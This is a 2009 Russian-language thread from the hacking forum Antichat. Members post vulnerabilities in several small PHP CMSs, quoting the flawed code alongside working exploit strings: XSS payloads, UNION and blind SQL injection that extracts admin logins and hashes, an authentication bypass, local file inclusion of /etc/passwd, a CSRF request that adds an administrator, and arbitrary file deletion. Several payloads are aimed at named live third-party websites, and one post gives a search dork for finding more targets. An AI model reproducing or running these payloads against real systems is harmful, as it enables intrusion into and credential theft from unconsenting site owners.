ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

15.05.2009, 17:17
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме: 418218
Репутация:
59
|
|
MagicSite CMS XSS
В строке поиска <script>alert('Antichat')</script>
Код:
http://www.magicsite.ru/search.php?sword=%3Cscript%3Ealert%28%27Antichat%27%29%3C%2Fscript%3E&x=0&y=0
Одним запросом и XSS и раскрытие путей и скуль инжект не далеке 
На сервере у них magic_quotes=ON, так как даные слешируются!
Код:
http://www.magicsite.ru/search.php?sword=1'
Вы искали: "1 \'"
Не далеко и скуль инжект!
Админка: http://www.magicsite.ru/admin/
Но вход разршон с браузера Microsoft Internet Explorer версии 5.5 и выше!
P.S.: Её продают за 24 505,00 р. =//
Последний раз редактировалось bug1z; 15.05.2009 в 17:22..
|
|
|

15.05.2009, 17:54
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме: 418218
Репутация:
59
|
|
skillz CMS XSS
В поле Поиск по сайту:
"><script>alert(111)</script>
Код:
http://www.skillz.ru/index.php?search=%22%3E%3Cscript%3Ealert%28111%29%3C%2Fscript%3E&m=search
|
|
|

16.05.2009, 15:44
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
SOS Webpages
SOS Webpages
Сайт: http://www.soswebpages.com/
Табличка с логинами\хешами админов: hw_admin
Дефолтовый префикс: sos_
SQL-injection
Уязвимый код:
photo.php
PHP код:
. . .
if (isset($_GET['photo_id'])) {
$photo_id = mysql_real_escape_string($_GET['photo_id']);
$sql = "SELECT * FROM " . $dbprefix . "photos WHERE photo_id=$photo_id";
$result=mysql_query($sql);
. . .
Классный код )) Зачем спрашивается юзать mysql_real_escape_string() и при этом не обрамлять параметр кавычками в запросе
Аналогично с переменной event_id в этом же скрипте
PHP код:
. . .
elseif (isset($_GET['event_id'])) {
$event_id = mysql_real_escape_string($_GET['event_id']);
. . .
$sql = "SELECT * FROM " . $dbprefix . "events WHERE event_id=$event_id";
$result=mysql_query($sql);
. . .
Эксплуатация:
site.com/index.php?pages_id=1&photo_id=-1+union+select+1,2,3,concat_ws(0x2F,admin_user,adm in_password),5,6+from+sos_hw_admin
Пример:
http://www.temoinsdelamisericorde.fr/index.php?pages_id=38&photo_id=-1+union+select+1,2,3,concat_ws(0x2F,admin_user,adm in_password),5,6+from+sos_hw_admin&p=0
|
|
|

09.09.2009, 16:26
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
Сообщение от ElteRUS
SOS Webpages
Сайт: http://www.soswebpages.com/
Табличка с логинами\хешами админов: hw_admin
Дефолтовый префикс: sos_
SQL-injection
Уязвимый код:
photo.php
PHP код:
. . .
if (isset($_GET['photo_id'])) {
$photo_id = mysql_real_escape_string($_GET['photo_id']);
$sql = "SELECT * FROM " . $dbprefix . "photos WHERE photo_id=$photo_id";
$result=mysql_query($sql);
. . .
Классный код )) Зачем спрашивается юзать mysql_real_escape_string() и при этом не обрамлять параметр кавычками в запросе
Аналогично с переменной event_id в этом же скрипте
PHP код:
. . .
elseif (isset($_GET['event_id'])) {
$event_id = mysql_real_escape_string($_GET['event_id']);
. . .
$sql = "SELECT * FROM " . $dbprefix . "events WHERE event_id=$event_id";
$result=mysql_query($sql);
. . .
забавный код в файле admin_delete_image.php
PHP код:
/* admin_delete_image.php will delete an image from the server */
Require "passcheck.php";
$image=$_GET["image"];
if (file_exists("../uploads/$image")) {
unlink("../uploads/$image");
}
header("Location: admin_view_images.php");
exit;
?>
имея права админа можно удалить любые файлы!!который имеют соответсвующие права
admin/admin_delete_image.php?image=../index.php%00 и у нас стерается наш index.php
|
|
|

06.10.2009, 22:23
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
weenCompany
китайская цмс
Сайт: http://www.weentech.com/
Дорк: "Created by weenCompany"
SQL-injection
Уязвимый код:
index.php
PHP код:
. . .
if($article = $DB->query_first("SELECT title, metakeywords, metadescription
FROM " . TABLE_PREFIX . $_GET['moduleid']. " WHERE articleid = '" . $_GET['articleid'] . "'"))
. . .
Эксплуатация:
site.com/index.php?moduleid=m2_news[SQL-inj]&articleid=1
Примеры:
http://www.stone-business.com/index.php?moduleid=m2_news+where+articleid=-1+union+select+concat_ws(0x2F,username,password),2 ,3+from+cwsen_users--+&articleid=1
http://perrint.com/index.php?moduleid=m2_news+where+articleid=-1+union+select+concat_ws(0x2F,username,password),2 ,3+from+cwsen_users--+&articleid=1
Вывод в тайтле
|
|
|

03.06.2009, 09:55
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме: 7561206
Репутация:
1861
|
|
Сообщение от bug1z
skillz CMS XSS
В поле Поиск по сайту:
"><script>alert(111)</script>
Код:
http://www.skillz.ru/index.php?search=%22%3E%3Cscript%3Ealert%28111%29%3C%2Fscript%3E&m=search
LFI(требования: register_globals=on)
/forums/profile.php
Переменая $phpEx, судя по коду, должна была определятся в extension.inc, но разработчик по невнимательности, не включил в файл в дистрибутив, вследствии имеем возможность определить переменную и получить локальный инклуд
уязвимый код:
PHP код:
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
эксплуатирование:
Код:
/forums/profile.php?phpEx=../../../../../../../../../../../etc/passwd
(с) Iceangel_
|
|
|

21.05.2009, 20:45
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме: 2185909
Репутация:
308
|
|
Cifshanghai Script
Download: http://www.cifshanghai.com/
Vuln File: new.php
Exploit:
Код:
http://localhost/[path]/new.php?id=[SQL]
POC:
http://www.vennas.com/new.php?id=-1%20union%20select%201,2,3,4,group_concat(name,0x3 a,password)%20from%20fk_admin--
http://www.nicefurniture.com.cn/new.php?id=-20%20union%20select%201,2,3,4,5,6,group_concat(nam e,0x3a,password),8%20from%20fk_admin-
|
|
|

26.05.2009, 17:16
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме: 2185909
Репутация:
308
|
|
CuteNews
CSRF:
Код:
http://localhost/cutenews/index.php
POST /cutenews/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost/cutenews/index.php?mod=editusers&action=list
Cookie: lastusername=underwater; username=underwater; md5_password=xxx;
Content-Type: application/x-www-form-urlencoded
Content-Length: 128
regusername=underwater®password=_123456®nickname=underwater®email=underwater%40gmail.com®level=1&action=adduser&mod=editusers
Код:
http://localhost/cutenews/index.php?regusername=underwater®password=_123456®nickname=underwater®email=underwater%40gmail.com®level=1&action=adduser&mod=editusers
Пользователь Добавлен
Пользователь underwater был успешно добавлен в качестве администратора
вернуться
Про шелл уже не стал писать:=\
|
|
|

03.06.2009, 09:42
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме: 7561206
Репутация:
1861
|
|
Уязвимости Simple Ban
download: http://boedesign.com/downloads/simpleban_v1.5.zip
Blind SQL-injection(требования: magic_quotes=off)
updatenote.php
уязвимый код:
PHP код:
$id = $_GET["fieldname"];
$note = $_GET["content"];
mysql_query("UPDATE notes SET note='$note' WHERE id='$id'") or die ("I could not insert");
эксплуатирование:
Код:
updatenote.php?content=9999'+or+if(ascii(substring((select+concat_ws(0x3a,user,pass)+from+admin),1,1))>1,BENCHMARK(2000000,md5(current_date)),2)--+
в случае истинности условия получаем небольшую задержку
bypass(требования: magic_quotes=off)
login.php
уязвимый код:
PHP код:
$user = $_POST['user'];
$pass = $_POST['pass'];
if($_POST['login']){
// QUERY ADMIN DATABASE
$getlogin = "SELECT * FROM admin WHERE user='$user' and pass='$pass'";
$getlogin2 = mysql_query($getlogin);
эксплуатирование:
логинимся с именем:
' or 1=1--
(с) Iceangel_
Последний раз редактировалось Iceangel_; 03.06.2009 в 09:47..
|
|
|
Уязвимости Potato News 1.0.2 |

03.06.2009, 16:20
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме: 7561206
Репутация:
1861
|
|
Уязвимости Potato News 1.0.2
Уязвимости Potato News 1.0.2
download: http://potato-news.googlecode.com/files/potatonews-1.0.2.zip
LFI
(требования: register_globals=on)
/timeago.php
уязвимый код:
PHP код:
if (file_exists("data/comments/$nid.ip.php")) {
include("data/comments/$nid.ip.php");
эксплуатирование:
Код:
/timeago.php?nid=../../../../../../../../../../../../etc/passwd
(с) Iceangel_
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|